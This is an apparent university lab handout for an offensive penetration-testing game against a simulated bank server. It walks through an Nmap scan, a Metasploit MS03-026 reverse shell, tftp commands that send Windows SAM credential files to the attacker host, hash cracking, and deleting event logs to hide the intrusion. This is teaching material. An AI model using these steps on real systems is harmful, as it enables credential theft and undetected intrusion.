IST 451, Capstone Lab 1
Lab Exercise – Penetration Testing - Offense
Objectives
In this lab you will complete the following tasks:
· Learn how an attacker breaks into a system.
· Discover, penetrate, and exploit a network.
· Participate in a multi-team game to attack a network.
Visual Objective
Introduction
Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack by a cracker. A “cracker” is the term used for any malicious hacker, one who attempts to break into a system for personal gain. The best way for a company to find out their vulnerabilities in security is through a penetration test, rather than after an attack.
Working in the security field, you may be asked to perform penetration tests by your company. These tests usually have very structured reports, but the method of hacking is open to interpretation. Because hacking is illegal, it is extremely important that all consent forms have been signed and the people involved are notified. Without the forms, you would be liable for jail time as well as hefty fines.
Penetration testing uses the following steps:
- Information Gathering
- Penetration
- Foothold
- Privilege Escalation
- Stealth
- Network Penetration
These steps are just a way to explain the progression of an attack and are more of a guideline than an actual process.
The tasks in this lab are as follows:
Task 1
· Information Gathering
Task 2
· Penetration
Task 3
· Foothold
Task 4
· Privilege Escalation
Task 5
· Stealth
Incorporated in the Defense and Offensive Penetration Testing labs is a hacking game, which will test your skills learned throughout the semester against another team.
Rules of the Game
1) The game is won when either the Offense team breaks in and grabs the file socialsecurity.txt or the Defense team prevents the other team from taking their file in the time allotted.
2) The time limit for Defense setup is 30 minutes. You may patch and stop applications at this time, but all critical applications must be running when the attack begins.
3) The time limit for Offense attack is 30 minutes.
4) After the 30 minutes is up, the two teams must switch roles and replay the game.
5) You may not use any knowledge of the attacks gained in the attacking role. Be aware that the attacking team may use other techniques than what is provided in the attack document!
6) You may not move the file socialsecurity.txt
7) Defense will start first, and after 30 minutes the Offense team may start (or whenever Defense is finished with task 4). During Offense, the Defense team may perform Task 5 Intrusion Response, but the Defense team can never stop any applications (e.g., for patching purposes) longer than 5 seconds.
8) Scenario: Bank of IST Penetration Test
You have been tasked by Bank of IST to perform a penetration test on their internal and external network security. The consent forms have been signed and all other relevant documentation has been filled out. Your team will be acting as a “blue team,” which is a penetration test done with the entire network and security teams aware of it. A “red team” is a penetration test done with only a few people in the company knowing about it. The advantage of a red team is that it better simulates an attack since the security departments will have no time to prepare for the intrusion. However, it will provide a better environment in this lab to allow for preparations by each team.
Task 1 – Information Gathering
In this task you will discover more information about Bank of IST. The best source of information about a company is located on the Internet. In addition, you will learn how to port scan and analyze the results.
Be sure to include screenshots of important steps to include in your report.
Step 1: You will be penetrating the website first because it is the only external part of the company.
- Click on the terminal icon.
- In the command prompt window, type “ping 201.205.84.19” (We are using the IP Address here for simplicity, usually it will be www.something.com)
- The IP address should be returned to you.
Step 2: Now that you have some information on the web server, and its IP address, you can begin scanning its ports for vulnerabilities.
- Click on the K menu and navigate to BackTrack Utilities -> Enumeration -> Scanning -> NmapFE.
- Nmap should open and display several options. Nmap is one of the most used tools by hackers and security professionals alike. It scans servers for open ports, and can display important OS information as well.
- Click on the window and type the IP address of the server into it. Also click on “version probe,” “SYN stealth,” and “OS version.” Then click “Scan.”
- Results should be returned to you. Make sure you save the results in a text file, you do not want to scan again (in case they have an intrusion detection system which could detect it). It takes some time for the scan to complete, so be patient.
Step 3: With the results from the scan, you have a wealth of information about the server. Take a look at what ports are open.
Your next goal will be to find any vulnerabilities that deal with those services or the operating system. Use the resources listed at the end of this document to help you get your answer. Do not proceed to the next part until you have the list of vulnerabilities!
Task 2 – Penetration
In this task you will learn how to penetrate the target server.
Be sure to include screenshots of important steps to include in your report.
Step 1: Now that you have a list of vulnerabilities to try, an attempt can be made to break into the server. In the interest of time, you will only be attempting the FTP vulnerability. Open Metasploit from K -> BackTrack Utilities -> Exploit Archives -> Metasploit framework -> MsfWeb.
Step 2: Open web browser (lower left part of screen) and type 127.0.0.1:55555
Step 3: When Metasploit starts, click “Filter Modules” and set it to OS: WinXP (Pro) Scroll down to “Microsoft RPC DCOM MS03-026 exploit” and click on it.
Step 4: Click Target “0”
Step 5: For payload, select “Win32_reverse_stg.” This is a reverse shell, which will give you command line access to the server if it succeeds.
Step 6: To configure the exploit, use the following option:
RHost: 201.205.84.19
Click exploit when finished, and wait a moment.
Step 7: Click OK when the server connection pop up comes up. Scroll down and click on the link to “Session x” on the bottom of the screen. You will then be in a command prompt environment on the web server!
Task 3 - Foothold
Be sure to include screenshots of important steps to include in your report.
Step 1: The next goal is to grab the password hash from the server and return it to your system. To do this, you must get the syskey and sam files. However, Windows prevents access to those files while it is running. The alternative is to try the repair directory, where Windows stores files that can help restore the system in case of a failure.
Type “cd %SYSTEMROOT%\repair” into the command prompt.
Step 2: Type “dir.” This will list contents of the directory you are currently in. It should show the sam and syskey file.
Step 3: To retrieve the sam and syskey file, you will have to send the files via command line and reverse FTP to your system. First, ensure the TFTP server is running. Go to the K -> Backtrack Services -> TFTPD -> Start TFTPD
Step 4: To obtain the files, in the command prompt type “tftp –i 192.168.1.4 PUT system” (this grabs the system file)
Next, grab the sam file. “tftp –I 192.168.1.4 PUT sam”
What these commands did was open a tftp connection to your own system, and send the files to it.
Step 5: Open terminal and type “cd /tmp” This will put you in the directory the password files were stored.
Step 6: To extract the syskey, you will be using a utility called bkhive. Type “bkhive system saved-syskey.txt” This will save the syskey into a file called “saved-syskey.txt”
Step 7: To extract the password hash into a text file, you will need to do the following:
Type “samdump2 sam saved-syskey.txt > pwhash.txt”
This command uses the utility samdump2 to extract the Windows password hash from the sam file using the syskey you recovered in step 12 and then puts it in a text file.
Verify that the step worked by typing “nano pwhash.txt” It should show 3 hashes and usernames. Press Ctrl+X to exit.
Step 8: To crack the passwords, we are going to use an emerging technique for password cracking called Rainbow Tables. A rainbow table is a generated hash set which simply contains all passwords of a certain length hashed. The beauty of this is that a password of any complexity (letters, numbers, special characters) can be quickly found by simply doing a find on the hash given to it. So if the hash was 34$#@434@32, and the database has the same hash, it simply returns the original value that generated it.
Copy pwhash.txt to a thumb drive by typing “cp pwhash.txt /mnt/sdb1_removable”
Step 9: Go to a lab computer and put the thumbdrive into the system. Go to the website www.plain-text.info (a site which has rainbow tables online). Click “Add Hashes” and copy the entire line from the “Administrator:” section and paste it into the hash section. Choose “lm” for the algorithm and type the security code. The next screen should show the password value on top.
Write down the password and include it in your report.
Task 4 – Privilege Escalation/Stealth
Be sure to include screenshots of important steps to include in your report.
Since you have cracked the administrator password, there is no need to escalate your privileges. However, it is extremely important that the logs are erased so an administrator doesn’t realize you are there.
Step 1: First, connect to the server using remote desktop. Open the client by going to
K -> Internet -> Remote Desktop Client.
Step 2: Type “201.205.84.19” into the host section, and when login screen appears, use the administrator account and password you cracked to get inside.
Step 3: Delete the logs by opening Start -> Control Panel -> Windows administrative tools and clicking on “Logs”. Click on “Delete all logs.” This will prevent any administrators from knowing that you have entered the system.
Task 5 – Get the file “socialsecurity.txt”
The goal of this final task is to use the foothold you have created to capture the file “socialsecurity.txt” on the web server.
Use any means necessary to break in remotely and capture the file.
Appendix I – Web Resources
· National Vulnerability Database: http://nvd.nist.gov/
· MilW0rm (exploit database): http://www.milw0rm.com/
· Online Rainbow Tables: http://plain-text.info/
· Metasploit Project Exploit List:
o http://www.metasploit.com/projects/Framework/exploits.html
Report to deliver:
The group report is to show what you did in the project. Please clearly state your results of this project. You are expected to hand in a report in the following formats:
· A cover page (including project title) with group name and group members
· A table of contents with page numbers
· Using double-spaced typing for convenient grading
· Hard copies only, Font size 12, Single column
· A bound or stapled document, with numbered pages
The report should have the following sections. Each section has multiple items. You need to write a report section by section that covers all required items. But you do not have to write the report item by item. Take screenshots if it is necessary.
Section I: Introduction:
You should have the following parts:
· Describe the goal and motivation of this project. In addition to what has been stated in the project instruction, please tell your own expectation in this project.
· Give an outline of this report, in which the content of each section needs to be briefly described.
Section II: Task 1
You should have the following parts:
· Briefly describe the concept of a penetration test. Why is this test important for a company?
· What is the purpose of the Nmap tool?
· What is the purpose of researching the company instead of going directly to Nmap?
· How many vulnerabilities did you find on the web sites? Did anything about this surprise you?
Section III: Task 2
You should have the following parts:
· Briefly describe the functionality of the Metasploit Framework.
· Were you successful in breaking into the server the first time? Why or why not?
· What other ways can you penetrate a system besides using Metasploit?
Section IV: Task 3
You should have the following parts:
· What is reverse FTP and why did you use it in this situation?
· Briefly describe the purpose of the foothold step.
Section V: Task 4